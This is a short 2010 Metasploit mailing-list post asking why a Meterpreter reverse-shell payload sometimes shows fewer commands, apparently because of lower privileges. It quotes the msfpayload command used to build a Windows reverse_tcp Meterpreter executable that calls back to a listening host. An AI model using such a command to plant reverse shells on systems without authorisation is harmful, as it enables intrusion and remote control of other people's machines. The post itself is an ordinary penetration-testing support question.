Metasploit mailing list archives

Meterpreter reverse shell error.

From: eski mo <eskimo.ganges () gmail com>
Date: Tue, 22 Jun 2010 10:58:23 +0530

Hi
Im experiencing a strange behavior of meterpreter reverse-connect
payload . I've created this payload using cmd "./msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.184 X >
Meterpreter.exe"

Using this meterpreter.exe , some time I get all the help commands (
as intended) and rest of the time, I only get small subset of these
commands . Commands like shell, ipconfig etc are not included in the
later list.Looks like when small subset commands are available, the
exe is having less privileges.

There is no set pattern existing of then i get all the commands and
when not. However , when i reset my Win Machine and run this
meterpreter.exe , first time i always get all the command.

Please clarify if its a bug or not.

Regards
EskiIVI0

.